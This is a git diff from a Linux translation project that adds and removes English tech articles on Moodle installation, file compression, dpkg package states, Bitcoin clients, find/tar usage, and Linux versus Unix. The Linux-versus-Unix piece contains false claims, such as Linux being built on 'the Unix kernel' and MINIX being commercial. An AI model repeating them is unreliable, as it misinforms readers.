||||
save the file and enable the virtual host
|
||||
```
|
||||
a2ensite yourdomain.com
|
||||
|
||||
Enabling site yourdomain.com.
|
||||
To activate the new configuration, you need to run:
|
||||
service apache2 reload
|
||||
```
|
||||
|
||||
Finally, reload the web server as suggested, for the changes to take effect
|
||||
```
|
||||
service apache2 reload
|
||||
```
|
||||
|
||||
### 9. Follow the on-screen instructions and complete the installation
|
||||
|
||||
Now, go to `http://yourdomain.com` and follow the on-screen instructions to complete the Moodle installation. For more information on how to configure and use Moodle, you can check their [official documentation][4].
|
||||
|
||||
You don't have to install Moodle on Ubuntu 16.04, if you use one of our [optimized Moodle hosting][5], in which case you can simply ask our expert Linux admins to install and configure the latest version of Moodle on Ubuntu 16.04 for you. They are available 24×7 and will take care of your request immediately.
|
||||
|
||||
**PS.** If you liked this post on how to install Moodle on Ubuntu 16.04, please share it with your friends on the social networks using the buttons on the left or simply leave a reply below. Thanks.
|
||||
|
||||
--------------------------------------------------------------------------------
|
||||
|
||||
via: https://www.rosehosting.com/blog/how-to-install-moodle-on-ubuntu-16-04/
|
||||
|
||||
作者:[RoseHosting][a]
|
||||
译者:[译者ID](https://github.com/译者ID)
|
||||
校对:[校对者ID](https://github.com/校对者ID)
|
||||
|
||||
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||
|
||||
[a]:https://www.rosehosting.com
|
||||
[1]:https://www.rosehosting.com/blog/wp-content/uploads/2017/12/How-to-Install-Moodle-on-Ubuntu-16.04.jpg
|
||||
[2]:https://moodle.com/hq
|
||||
[3]:https://www.rosehosting.com/cdn-cgi/l/email-protection
|
||||
[4]:https://docs.moodle.org/34/en/Main_page
|
||||
[5]:https://www.rosehosting.com/moodle-hosting.html
|
@ -1,144 +0,0 @@
|
||||
How to squeeze the most out of Linux file compression
|
||||
======
|
||||
If you have any doubt about the many commands and options available on Linux systems for file compression, you might want to take a look at the output of the **apropos compress** command. Chances are you'll be surprised by the many commands that you can use for compressing and decompressing files, as well as for comparing compressed files, examining and searching through the content of compressed files, and even changing a compressed file from one format to another (i.e., .z format to .gz format).
|
||||
|
||||
You're likely to see all of these entries just for the suite of bzip2 compression commands. Add in zip, gzip, and xz, and you've got a lot of interesting options.
|
||||
```
|
||||
$ apropos compress | grep ^bz
|
||||
bzcat (1) - decompresses files to stdout
|
||||
bzcmp (1) - compare bzip2 compressed files
|
||||
bzdiff (1) - compare bzip2 compressed files
|
||||
bzegrep (1) - search possibly bzip2 compressed
|
||||
files for a regular expression
|
||||
bzexe (1) - compress executable files in place
|
||||
bzfgrep (1) - search possibly bzip2 compressed
|
||||
files for a regular expression
|
||||
bzgrep (1) - search possibly bzip2 compressed
|
||||
files for a regular expression
|
||||
bzip2 (1) - a block-sorting file compressor,
|
||||
v1.0.6
|
||||
bzless (1) - file perusal filter for crt viewing
|
||||
of bzip2 compressed text
|
||||
bzmore (1) - file perusal filter for crt viewing
|
||||
of bzip2 compressed text
|
||||
|
||||
```
|
||||
|
||||
On my Ubuntu system, over 60 commands were listed in response to the apropos compress command.
|
||||
|
||||
### Compression algorithms
|
||||
|
||||
Compression is not a one-size-fits-all issue. Some compression tools are "lossy," such as those used to reduce the size of mp3 files while allowing listeners to have what is nearly the same musical experience as listening to the originals. But algorithms used on the Linux command line to compress or archive user files have to be able to reproduce the original content exactly. In other words, they have to be lossless.
|
||||
|
||||
How is that done? It's easy to imagine how 300 of the same character in a row could be compressed to something like "300X," but this type of algorithm wouldn't be of much benefit for most files because they wouldn't contain long sequences of the same character any more than they would completely random data. Compression algorithms are far more complex and have only been getting more so since compression was first introduced in the toddler years of Unix.
|
||||
|
||||
### Compression commands on Linux systems
|
||||
|
||||
The commands most commonly used for file compression on Linux systems include zip, gzip, bzip2 and xz. All of those commands work in similar ways, but there are some tradeoffs in terms of how much the file content is squeezed (how much space you save), how long the compression takes, and how compatible the compressed files are with other systems you might need to use them on.
|
||||
|
||||
Sometimes the time and effort of compressing a file doesn't pay off very well. In the example below, the "compressed" file is actually larger than the original. While this isn't generally the case, it can happen -- especially when the file content approaches some degree of randomness.
|
||||
```
|
||||
$ time zip bigfile.zip bigfile
|
||||
adding: bigfile (deflated 0%)
|
||||
|
||||
real 1m6.310s
|
||||
user 0m52.424s
|
||||
sys 0m2.288s
|
||||
$
|
||||
$ ls -l bigfile*
|
||||
-rw-rw-r-- 1 shs shs 1073741824 Dec 8 10:06 bigfile
|
||||
-rw-rw-r-- 1 shs shs 1073916184 Dec 8 11:39 bigfile.zip
|
||||
|
||||
```
|
||||
|
||||
Note that the compressed version of the file (bigfile.zip) is actually a little larger than the original file. If compression increases the size of a file or reduces its size by some very small percentage, the only benefit may be that you may have a convenient online backup. If you see a message like this after compressing a file, you're not gaining much.
|
||||
```
|
||||
(deflated 1%)
|
||||
|
||||
```
|
||||
|
||||
The content of a file plays a large role in how well it will compress. The file that grew in size in the example above was fairly random. Compress a file containing only zeroes, and you'll see an amazing compression ratio. In this admittedly extremely unlikely scenario, all three of the commonly used compression tools do an excellent job.
|
||||
```
|
||||
-rw-rw-r-- 1 shs shs 10485760 Dec 8 12:31 zeroes.txt
|
||||
-rw-rw-r-- 1 shs shs 49 Dec 8 17:28 zeroes.txt.bz2
|
||||
-rw-rw-r-- 1 shs shs 10219 Dec 8 17:28 zeroes.txt.gz
|
||||
-rw-rw-r-- 1 shs shs 1660 Dec 8 12:31 zeroes.txt.xz
|
||||
-rw-rw-r-- 1 shs shs 10360 Dec 8 12:24 zeroes.zip
|
||||
|
||||
```
|
||||
|
||||
While impressive, you're not likely to see files with over 10 million bytes compressing down to fewer than 50, since files like these are extremely unlikely.
|
||||
|
||||
In this more realistic example, the size differences are altogether different -- and not very significant -- for a fairly small jpg file.
|
||||
```
|
||||
-rw-r--r-- 1 shs shs 13522 Dec 11 18:58 image.jpg
|
||||
-rw-r--r-- 1 shs shs 13875 Dec 11 18:58 image.jpg.bz2
|
||||
-rw-r--r-- 1 shs shs 13441 Dec 11 18:58 image.jpg.gz
|
||||
-rw-r--r-- 1 shs shs 13508 Dec 11 18:58 image.jpg.xz
|
||||
-rw-r--r-- 1 shs shs 13581 Dec 11 18:58 image.jpg.zip
|
||||
|
||||
```
|
||||
|
||||
Do the same thing with a large text file, and you're likely to see some significant differences.
|
||||
```
|
||||
$ ls -l textfile*
|
||||
-rw-rw-r-- 1 shs shs 8740836 Dec 11 18:41 textfile
|
||||
-rw-rw-r-- 1 shs shs 1519807 Dec 11 18:41 textfile.bz2
|
||||
-rw-rw-r-- 1 shs shs 1977669 Dec 11 18:41 textfile.gz
|
||||
-rw-rw-r-- 1 shs shs 1024700 Dec 11 18:41 textfile.xz
|
||||
-rw-rw-r-- 1 shs shs 1977808 Dec 11 18:41 textfile.zip
|
||||
|
||||
```
|
||||
|
||||
In this case, xz reduced the size considerably more than the other commands with bzip2 coming in second.
|
||||
|
||||
### Looking at compressed files
|
||||
|
||||
The *more commands (bzmore and others) allow you to view the contents of compressed files without having to uncompress them first.
|
||||
```
|
||||
bzmore (1) - file perusal filter for crt viewing of bzip2 compressed text
|
||||
lzmore (1) - view xz or lzma compressed (text) files
|
||||
xzmore (1) - view xz or lzma compressed (text) files
|
||||
zmore (1) - file perusal filter for crt viewing of compressed text
|
||||
|
||||
```
|
||||
|
||||
These commands are all doing a good amount of work, since they have to decompress a file's content just to display it to you. They do not, on the other hand, leave uncompressed file content on the system. They simply decompress on the fly.
|
||||
```
|
||||
$ xzmore textfile.xz | head -1
|
||||
Here is the agenda for tomorrow's staff meeting:
|
||||
|
||||
```
|
||||
|
||||
### Comparing compressed files
|
||||
|
||||
While several of the compression toolsets include a diff command (e.g., xzdiff), these tools pass the work off to cmp and diff and are not doing any algorithm-specific comparisons. For example, the xzdiff command will compare bz2 files as easily as it will compare xz files.
|
||||
|
||||
### How to choose the best Linux compression tool
|
||||
|
||||
The best tool for the job depends on the job. In some cases, the choice may depend on the content of the data being compressed, but it's more likely that your organization's conventions are just as important unless you're in a real pinch for disk space. The best general suggestions seem to be these:
|
||||
|
||||
**zip** is best when files need to be shared with or used on Windows systems.
|
||||
|
||||
**gzip** may be best when you want the files to be usable on any Unix/Linux system. Though bzip2 is becoming nearly as ubiquitous, it is likely to take longer to run.
|
||||
|
||||
**bzip2** uses a different algorithm than gzip and is likely to yield a smaller file, but it takes a little longer to get the job done.
|
||||
|
||||
**xz** generally offers the best compression rates, but also takes considerably longer to run. It's also newer than the other tools and may not yet exist on all the systems you need to work with.
|
||||
|
||||
### Wrap-up
|
||||
|
||||
There are a number of choices when it comes to how to compress files and only a few situations in which they don't yield valuable disk space savings.
|
||||
|
||||
|
||||
--------------------------------------------------------------------------------
|
||||
|
||||
via: https://www.networkworld.com/article/3240938/linux/how-to-squeeze-the-most-out-of-linux-file-compression.html
|
||||
|
||||
作者:[Sandra Henry-Stocker][a]
|
||||
译者:[译者ID](https://github.com/译者ID)
|
||||
校对:[校对者ID](https://github.com/校对者ID)
|
||||
|
||||
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||
|
||||
[a]:https://www.networkworld.com
|
126
sources/tech/20171214 Peeking into your Linux packages.md
Normal file
126
sources/tech/20171214 Peeking into your Linux packages.md
Normal file
@ -0,0 +1,126 @@
|
||||
(translating by runningwater)
|
||||
Peeking into your Linux packages
|
||||
======
|
||||
Do you ever wonder how many _thousands_ of packages are installed on your Linux system? And, yes, I said "thousands." Even a fairly modest Linux system is likely to have well over a thousand packages installed. And there are many ways to get details on what they are.
|
||||
|
||||
First, to get a quick count of your installed packages on a Debian-based distribution such as Ubuntu, use the command **apt list --installed** like this:
|
||||
```
|
||||
$ apt list --installed | wc -l
|
||||
2067
|
||||
|
||||
```
|
||||
|
||||
This number is actually one too high because the output contains "Listing..." as its first line. This command would be more accurate:
|
||||
```
|
||||
$ apt list --installed | grep -v "^Listing" | wc -l
|
||||
2066
|
||||
|
||||
```
|
||||
|
||||
To get some details on what all these packages are, browse the list like this:
|
||||
```
|
||||
$ apt list --installed | more
|
||||
Listing...
|
||||
a11y-profile-manager-indicator/xenial,now 0.1.10-0ubuntu3 amd64 [installed]
|
||||
account-plugin-aim/xenial,now 3.12.11-0ubuntu3 amd64 [installed]
|
||||
account-plugin-facebook/xenial,xenial,now 0.12+16.04.20160126-0ubuntu1 all [installed]
|
||||
account-plugin-flickr/xenial,xenial,now 0.12+16.04.20160126-0ubuntu1 all [installed]
|
||||
account-plugin-google/xenial,xenial,now 0.12+16.04.20160126-0ubuntu1 all [installed]
|
||||
account-plugin-jabber/xenial,now 3.12.11-0ubuntu3 amd64 [installed]
|
||||
account-plugin-salut/xenial,now 3.12.11-0ubuntu3 amd64 [installed]
|
||||
|
||||
```
|
||||
|
||||
That's a lot of detail to absorb -- especially if you let your eyes wander through all 2,000+ files rolling by. It contains the package names, versions, and more but isn't the easiest information display for us humans to parse. The dpkg-query makes the descriptions quite a bit easier to understand, but they will wrap around your command window unless it's _very_ wide. So, the data display below has been split into the left and right hand sides to make this post easier to read.
|
||||
|
||||
Left side:
|
||||
```
|
||||
$ dpkg-query -l | more
|
||||
Desired=Unknown/Install/Remove/Purge/Hold
|
||||
| Status=Not/Inst/Conf-files/Unpacked/halF-conf/Half-inst/trig-aWait/Trig-pend
|
||||
|/ Err?=(none)/Reinst-required (Status,Err: uppercase=bad)
|
||||
||/ Name Version
|
||||
+++-==============================================-=================================-
|
||||
ii a11y-profile-manager-indicator 0.1.10-0ubuntu3
|
||||
ii account-plugin-aim 3.12.11-0ubuntu3
|
||||
ii account-plugin-facebook 0.12+16.04.20160126-0ubuntu1
|
||||
ii account-plugin-flickr 0.12+16.04.20160126-0ubuntu1
|
||||
ii account-plugin-google 0.12+16.04.20160126-0ubuntu1
|
||||
ii account-plugin-jabber 3.12.11-0ubuntu3
|
||||
ii account-plugin-salut 3.12.11-0ubuntu3
|
||||
ii account-plugin-twitter 0.12+16.04.20160126-0ubuntu1
|
||||
rc account-plugin-windows-live 0.11+14.04.20140409.1-0ubuntu2
|
||||
|
||||
```
|
||||
|
||||
Right side:
|
||||
```
|
||||
Architecture Description
|
||||
============-=====================================================================
|
||||
amd64 Accessibility Profile Manager - Unity desktop indicator
|
||||
amd64 Messaging account plugin for AIM
|
||||
all GNOME Control Center account plugin for single signon - facebook
|
||||
all GNOME Control Center account plugin for single signon - flickr
|
||||
all GNOME Control Center account plugin for single signon
|
||||
amd64 Messaging account plugin for Jabber/XMPP
|
||||
amd64 Messaging account plugin for Local XMPP (Salut)
|
||||
all GNOME Control Center account plugin for single signon - twitter
|
||||
all GNOME Control Center account plugin for single signon - windows live
|
||||
|
||||
```
|
||||
|
||||
The "ii" and "rc" designations at the beginning of each line (see "Left side" above) are package state indicators. The first letter represents the desirable package state:
|
||||
```
|
||||
u -- unknown
|
||||
i -- install
|
||||
r -- remove/deinstall
|
||||
p -- purge (remove including config files)
|
||||
h -- hold
|
||||
|
||||
```
|
||||
|
||||
The second represents the current package state:
|
||||
```
|
||||
n -- not-installed
|
||||
i -- installed
|
||||
c -- config-files (only the config files are installed)
|
||||
U -- unpacked
|
||||
F -- half-configured (the configuration failed for some reason)
|
||||
h -- half-installed (installation failed for some reason)
|
||||
W -- triggers-awaited (the package is waiting for a trigger from another package)
|
||||
t -- triggers-pending (the package has been triggered)
|
||||
|
||||
```
|
||||
|
||||
An added "R" at the end of the normally two-character field would indicate that reinstallation is required. You may never run into these.
|
||||
|
||||
One easy way to take a quick look at your overall package status is to count how many packages are in which of the different states:
|
||||
```
|
||||
$ dpkg-query -l | tail -n +6 | awk '{print $1}' | sort | uniq -c
|
||||
2066 ii
|
||||
134 rc
|
||||
|
||||
```
|
||||
|
||||
I excluded the top five lines from the dpkg-query output above because these are the header lines that would have confused the output.
|
||||
|
||||
The two lines basically tell us that on this system, 2,066 packages should be and are installed, while 134 other packages have been removed but have left configuration files behind. You can always remove a package's remaining configuration files with a command like this:
|
||||
```
|
||||
$ sudo dpkg --purge xfont-mathml
|
||||
|
||||
```
|
||||
|
||||
Note that the command above would have removed the package binaries along with the configuration files if both were still installed.
|
||||
|
||||
|
||||
--------------------------------------------------------------------------------
|
||||
|
||||
via: https://www.networkworld.com/article/3242808/linux/peeking-into-your-linux-packages.html
|
||||
|
||||
作者:[Sandra Henry-Stocker][a]
|
||||
译者:[runningwater](https://github.com/runningwater)
|
||||
校对:[校对者ID](https://github.com/校对者ID)
|
||||
|
||||
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||
|
||||
[a]:https://www.networkworld.com/author/Sandra-Henry_Stocker/
|
@ -0,0 +1,89 @@
|
||||
translating-----geekpi
|
||||
|
||||
5 of the Best Bitcoin Clients for Linux
|
||||
======
|
||||
By now you have probably heard of [Bitcoin][1] or the [Blockchain][2]. The price of Bitcoin has skyrocketed several times in the past months, and the trend continues almost daily. The demand for Bitcoin seems to grow astronomically by the minute.
|
||||
|
||||
Accompanying the demand for the digital currency is the demand for software to manage the currency: Bitcoin clients. A quick search of "Bitcoin client" on Google Play or the App Store will yield quite a number of results. There are many Bitcoin clients that support Linux, but only 5 interesting ones are mentioned here, in no particular order.
|
||||
|
||||
### Why Use a Client?
|
||||
A client makes it easy to manage your Bitcoin or Bitcoins. Many provide different levels of security to make sure you don't lose your precious digital currency. In short, you'll find it helpful, trust me.
|
||||
|
||||
#### 1. Bitcoin Core
|
||||
|
||||
![Bitcoin Core][3]
|
||||
|
||||
This is the core Bitcoin client, as the name suggests. It has a very simple interface. It is secure and provides the best privacy compared to other popular clients. On the down side, it has to download all Bitcoin transaction history, which is over 150 GB of data. Hence, it uses more resources than many other clients.
|
||||
|
||||
To get the Bitcoin Core client, visit the download [page][4]. Ubuntu users can install it via PPA:
|
||||
```
|
||||
sudo add-apt-repository ppa:bitcoin/bitcoin
|
||||
sudo apt update
|
||||
sudo apt install bitcoin*
|
||||
```
|
||||
|
||||
#### 2. Electrum
|
||||
![Electrum][5]
|
||||
|
||||
Electrum is another interesting Bitcoin client. It is more forgiving than most clients as funds can be recovered from a secret passphrase - no need to ever worry about forgetting keys. It provides several other features that make it convenient to manage Bitcoins such as multisig and cold storage. A plus for Electrum is the ability to see the fiat currency equivalent of your Bitcoins. Unlike Bitcoin Core, it does not require a full copy of your Bitcoin transaction history.
|
||||
|
||||
The following is how to get Electrum:
|
||||
```
|
||||
sudo apt-get install python3-setuptools python3-pyqt5 python3-pip
|
||||
sudo pip3 install https://download.electrum.org/3.0.3/Electrum-3.0.3.tar.gz
|
||||
```
|
||||
|
||||
Make sure to check out the appropriate version you want to install on the [website][6].
|
||||
|
||||
#### 3. Bitcoin Knots
|
||||
|
||||
![Bitcoin Knots][13]
|
||||
|
||||
Bitcoin Knots is only different from Bitcoin Core in that it provides more advanced features than Bitcoin Core. In fact, it is derived from Bitcoin Core. It is important to know some of these features are not well-tested.
|
||||
|
||||
As with Bitcoin Core, Bitcoin Knots also uses a huge amount of space, as a copy of the full Bitcoin transaction is downloaded.
|
||||
|
||||
The PPA and tar files can be found [here][7].
|
||||
|
||||
#### 4. Bither
|
||||
|
||||
![Bither][8]
|
||||
|
||||
Bither has a really simple user interface and is very simple to use. It allows password access and has an exchange rate viewer and cold/hot modes. The client is simple, and it works!
|
||||
|
||||
Download Bither [here][9].
|
||||
|
||||
#### 5. Armory
|
||||
|
||||
![Armory][10]
|
||||
|
||||
Armory is another common Bitcoin client. It includes numerous features such as cold storage. This enables you to manage your Bitcoins without connecting to the Internet. Moreover, there are additional security measures to ensure private keys are fully secured from attacks.
|
||||
|
||||
You can get the deb file from this download [site][11]. Open the deb file and install on Ubuntu or Debian. You can also get the project on [GitHub][12].
|
||||
|
||||
Now that you know a Bitcoin client to manage your digital currency, sit back, relax, and watch your Bitcoin value grow.
|
||||
|
||||
--------------------------------------------------------------------------------
|
||||
|
||||
via: https://www.maketecheasier.com/bitcoin-clients-for-linux/
|
||||
|
||||
作者:[Bruno Edoh][a]
|
||||
译者:[译者ID](https://github.com/译者ID)
|
||||
校对:[校对者ID](https://github.com/校对者ID)
|
||||
|
||||
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||
|
||||
[a]:https://www.maketecheasier.com
|
||||
[1]:https://www.maketecheasier.com/what-is-bitcoin-and-how-you-can-utilize-it-online/
|
||||
[2]:https://www.maketecheasier.com/bitcoin-blockchain-bundle-deals/
|
||||
[3]:https://www.maketecheasier.com/assets/uploads/2017/12/bitcoin-core-interface.png (Bitcoin Core)
|
||||
[4]:https://bitcoin.org/en/download
|
||||
[5]:https://www.maketecheasier.com/assets/uploads/2017/12/electrum-interface.png (Electrum)
|
||||
[6]:https://electrum.org/
|
||||
[7]:https://bitcoinknots.org/
|
||||
[8]:https://www.maketecheasier.com/assets/uploads/2017/12/bitter-interface.png (Bither)
|
||||
[9]:https://bither.net/
|
||||
[10]:https://www.maketecheasier.com/assets/uploads/2017/12/armory-logo2.png (Armory)
|
||||
[11]:https://www.bitcoinarmory.com/download/
|
||||
[12]:https://github.com/goatpig/BitcoinArmory
|
||||
[13]:https://www.maketecheasier.com/assets/uploads/2017/12/bitcoin-core-interface.png
|
@ -0,0 +1,120 @@
|
||||
How to find and tar files into a tar ball
|
||||
======
|
||||
|
||||
I would like to find all document files (*.doc) and create a tarball of those files and store it in /nfs/backups/docs/file.tar. Is it possible to find and tar files on a Linux or Unix-like system?
|
||||
|
||||
The find command is used to search for files in a directory hierarchy as per the given criteria. The tar command is an archiving utility for Linux and Unix-like systems to create tarballs.
|
||||
|
||||
[![How to find and tar files on linux unix][1]][1]
|
||||
|
||||
Let us see how to combine tar command with find command to create a tarball in a single command line option.
|
||||
|
||||
## Find command
|
||||
|
||||
The syntax is:
|
||||
```
|
||||
find /path/to/search -name "file-to-search" -options
|
||||
## find all Perl (*.pl) files ##
|
||||
find $HOME -name "*.pl" -print
|
||||
## find all *.doc files ##
|
||||
find $HOME -name "*.doc" -print
|
||||
## find all *.sh (shell scripts) and run ls -l command on it ##
|
||||
find . -iname "*.sh" -exec ls -l {} +
|
||||
```
|
||||
Sample outputs from the last command:
|
||||
```
|
||||
-rw-r--r-- 1 vivek vivek 1169 Apr 4 2017 ./backups/ansible/cluster/nginx.build.sh
|
||||
-rwxr-xr-x 1 vivek vivek 1500 Dec 6 14:36 ./bin/cloudflare.pure.url.sh
|
||||
lrwxrwxrwx 1 vivek vivek 13 Dec 31 2013 ./bin/cmspostupload.sh -> postupload.sh
|
||||
lrwxrwxrwx 1 vivek vivek 12 Dec 31 2013 ./bin/cmspreupload.sh -> preupload.sh
|
||||
lrwxrwxrwx 1 vivek vivek 14 Dec 31 2013 ./bin/cmssuploadimage.sh -> uploadimage.sh
|
||||
lrwxrwxrwx 1 vivek vivek 13 Dec 31 2013 ./bin/faqpostupload.sh -> postupload.sh
|
||||
lrwxrwxrwx 1 vivek vivek 12 Dec 31 2013 ./bin/faqpreupload.sh -> preupload.sh
|
||||
lrwxrwxrwx 1 vivek vivek 14 Dec 31 2013 ./bin/faquploadimage.sh -> uploadimage.sh
|
||||
-rw-r--r-- 1 vivek vivek 778 Nov 6 14:44 ./bin/mirror.sh
|
||||
-rwxr-xr-x 1 vivek vivek 136 Apr 25 2015 ./bin/nixcraft.com.301.sh
|
||||
-rwxr-xr-x 1 vivek vivek 547 Jan 30 2017 ./bin/paypal.sh
|
||||
-rwxr-xr-x 1 vivek vivek 531 Dec 31 2013 ./bin/postupload.sh
|
||||
-rwxr-xr-x 1 vivek vivek 437 Dec 31 2013 ./bin/preupload.sh
|
||||
-rwxr-xr-x 1 vivek vivek 1046 May 18 2017 ./bin/purge.all.cloudflare.domain.sh
|
||||
lrwxrwxrwx 1 vivek vivek 13 Dec 31 2013 ./bin/tipspostupload.sh -> postupload.sh
|
||||
lrwxrwxrwx 1 vivek vivek 12 Dec 31 2013 ./bin/tipspreupload.sh -> preupload.sh
|
||||
lrwxrwxrwx 1 vivek vivek 14 Dec 31 2013 ./bin/tipsuploadimage.sh -> uploadimage.sh
|
||||
-rwxr-xr-x 1 vivek vivek 1193 Oct 18 2013 ./bin/uploadimage.sh
|
||||
-rwxr-xr-x 1 vivek vivek 29 Nov 6 14:33 ./.vim/plugged/neomake/tests/fixtures/errors.sh
|
||||
-rwxr-xr-x 1 vivek vivek 215 Nov 6 14:33 ./.vim/plugged/neomake/tests/helpers/trap.sh
|
||||
```
|
||||
|
||||
## Tar command
|
||||
|
||||
To [create a tar ball of /home/vivek/projects directory][2], run:
|
||||
```
|
||||
$ tar -cvf /home/vivek/projects.tar /home/vivek/projects
|
||||
```
|
||||
|
||||
## Combining find and tar commands
|
||||
|
||||
The syntax is:
|
||||
```
|
||||
find /dir/to/search/ -name "*.doc" -exec tar -rvf out.tar {} \;
|
||||
```
|
||||
OR
|
||||
```
|
||||
find /dir/to/search/ -name "*.doc" -exec tar -rvf out.tar {} +
|
||||
```
|
||||
For example:
|
||||
```
|
||||
find $HOME -name "*.doc" -exec tar -rvf /tmp/all-doc-files.tar "{}" \;
|
||||
```
|
||||
OR
|
||||
```
|
||||
find $HOME -name "*.doc" -exec tar -rvf /tmp/all-doc-files.tar "{}" +
|
||||
```
|
||||
Where, find command options:
|
||||
|
||||
* **-name "*.doc"** : Find file as per given pattern/criteria. In this case find all *.doc files in $HOME.
|
||||
* **-exec tar ...** : Execute tar command on all files found by the find command.
|
||||
|
||||
Where, tar command options:
|
||||
|
||||
* **-r** : Append files to the end of an archive. Arguments have the same meaning as for -c option.
|
||||
* **-v** : Verbose output.
|
||||
  * **-f out.tar** : Append all files to the out.tar file.
|
||||
|
||||
|
||||
|
||||
It is also possible to pipe output of the find command to the tar command as follows:
|
||||
```
|
||||
find $HOME -name "*.doc" -print0 | tar -cvf /tmp/file.tar --null -T -
|
||||
```
|
||||
The -print0 option passed to the find command deals with special file names. The --null and -T - options tell the tar command to read its input from stdin/pipe. It is also possible to use the xargs command:
|
||||
```
|
||||
find $HOME -type f -name "*.sh" | xargs tar cfvz /nfs/x230/my-shell-scripts.tgz
|
||||
```
|
||||
See the following man pages for more info:
|
||||
```
|
||||
$ man tar
|
||||
$ man find
|
||||
$ man xargs
|
||||
$ man bash
|
||||
```
|
||||
|
||||
------------------------------
|
||||
|
||||
作者简介:
|
||||
|
||||
The author is the creator of nixCraft and a seasoned sysadmin and a trainer for the Linux operating system/Unix shell scripting. He has worked with global clients and in various industries, including IT, education, defense and space research, and the nonprofit sector. Follow him on Twitter, Facebook, Google+.
|
||||
|
||||
--------------------------------------------------------------------------------
|
||||
|
||||
via: https://www.cyberciti.biz/faq/linux-unix-find-tar-files-into-tarball-command/
|
||||
|
||||
作者:[Vivek Gite][a]
|
||||
译者:[译者ID](https://github.com/译者ID)
|
||||
校对:[校对者ID](https://github.com/校对者ID)
|
||||
|
||||
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||
|
||||
[a]:https://www.cyberciti.biz
|
||||
[1]:https://www.cyberciti.biz/media/new/faq/2017/12/How-to-find-and-tar-files-on-linux-unix.jpg
|
||||
[2]:https://www.cyberciti.biz/faq/creating-a-tar-file-linux-command-line/
|
143
sources/tech/20171215 Linux Vs Unix.md
Normal file
143
sources/tech/20171215 Linux Vs Unix.md
Normal file
@ -0,0 +1,143 @@
|
||||
|
||||
translating by HardworkFish
|
||||
|
||||
[![Linux vs. Unix](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/unix-vs-linux_orig.jpg)][1]
|
||||
|
||||
In computing, a substantial part of the population has a misconception that the **Unix** and **Linux** operating systems are one and the same. However, the opposite is true. Let's take a closer look.
|
||||
|
||||
### What is Unix?
|
||||
|
||||
[![what is unix](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/unix_orig.png)][2]
|
||||
|
||||
In IT, we come across
|
||||
|
||||
[Unix][3]
|
||||
|
||||
as an operating system (under the trademark), which was created by AT & T in 1969 in New Jersey, USA. Most operating systems are inspired by Unix, but Unix has also been inspired by the Multics system, which has not been completed. Another version of Unix was Plan 9 from Bell Labs.
|
||||
|
||||
### Where is Unix used?
|
||||
|
||||
As an operating system, Unix is used in particular for servers, workstations, and nowadays also for personal computers. It played a very important role in the creation of the Internet, the creation of computer networks or also the client-server model.
|
||||
|
||||
#### Characteristics of the Unix system:
|
||||
|
||||
  * supports multitasking
|
||||
|
||||
* Simplicity of control compared to Multics
|
||||
|
||||
* all data is stored as plain text
|
||||
|
||||
* tree saving of a single-root file
|
||||
|
||||
* access to multiple user accounts
|
||||
|
||||
#### Unix Operating System Composition:
|
||||
|
||||
|
||||
|
||||
**a)**
|
||||
|
||||
a monolithic operating system kernel that takes care of low-level and user-initiated operations, the total communication takes place via a system call.
|
||||
|
||||
**b)**
|
||||
|
||||
system utilities (or so-called utilities)
|
||||
|
||||
**c)**
|
||||
|
||||
many other applications
|
||||
|
||||
### What is Linux?
|
||||
|
||||
[![what is linux](http://www.linuxandubuntu.com/uploads/2/1/1/5/21152474/linux_orig.png)][4]
|
||||
|
||||
This is an open source operating system built on the principle of a Unix system. As the name of the open-source description suggests, it is a freely-downloadable system that can be downloaded externally, but it is also possible to interfere with the system's editing, adding, and then extending the source code. It's one of the biggest benefits, unlike today's operating systems that are paid (Windows, Mac OS X, ...). Not only was Unix a model for creating a new operating system, another important factor was the MINIX system. Unlike
|
||||
|
||||
**Linux**
|
||||
|
||||
, this version was used by its creator (
|
||||
|
||||
**Andrew Tanenbaum**
|
||||
|
||||
) as a commercial system.
|
||||
|
||||
|
||||
|
||||
[Linux][5]
|
||||
|
||||
began to be developed by
|
||||
|
||||
**Linus Torvalds**
|
||||
|
||||
in 1991, which was a system that he dealt with as a hobby. One of the main reasons why Linus started to deal with Unix was the simplicity of the system. The first official release of the provisory version of Linux (0.01) occurred on September 17, 1991\. Even though the system was imperfect and incomplete, it was of great interest to him, and within a few days, Linus started to write emails with other ideas about expansion or source codes.
|
||||
|
||||
### Characteristics of Linux
|
||||
|
||||
The cornerstone of Linux is the Unix kernel, which is based on the basic characteristics of Unix and the standards that are
|
||||
|
||||
**POSIX**
|
||||
|
||||
and Single
|
||||
|
||||
**UNIX Specification**
|
||||
|
||||
. As it may seem, the official name of the operating system is taken from the creator of
|
||||
|
||||
**Linus**
|
||||
|
||||
, where the end of the operating system name "x" is just a link to the
|
||||
|
||||
**Unix system**
|
||||
|
||||
.
|
||||
|
||||
#### Main features:
|
||||
|
||||
* run multiple tasks at once (multitasking)
|
||||
|
||||
* programs may consist of one or more processes (multipurpose system), and each process may have one or more threads
|
||||
|
||||
* multiuser, so it can run multiple user programs
|
||||
|
||||
* individual accounts are protected by appropriate authorization
|
||||
|
||||
* so the accounts have precisely defined system control rights
|
||||
|
||||
The author of
|
||||
|
||||
**Tux the Penguin's**
|
||||
|
||||
logo is Larry Ewing, who created it in 1996; it was adopted as the mascot of the open-source
|
||||
|
||||
**Linux operating system**
|
||||
|
||||
.
|
||||
|
||||
**Linus Torvalds**
|
||||
|
||||
proposed the initial name of the new operating system as "Freax" as free + freak + x (
|
||||
|
||||
**Unix system**
|
||||
|
||||
), but it did not like the
|
||||
|
||||
**FTP server**
|
||||
|
||||
where the provisory version of Linux was running.
|
||||
|
||||
--------------------------------------------------------------------------------
|
||||
|
||||
via: http://www.linuxandubuntu.com/home/linux-vs-unix
|
||||
|
||||
作者:[linuxandubuntu][a]
|
||||
译者:[译者ID](https://github.com/译者ID)
|
||||
校对:[校对者ID](https://github.com/校对者ID)
|
||||
|
||||
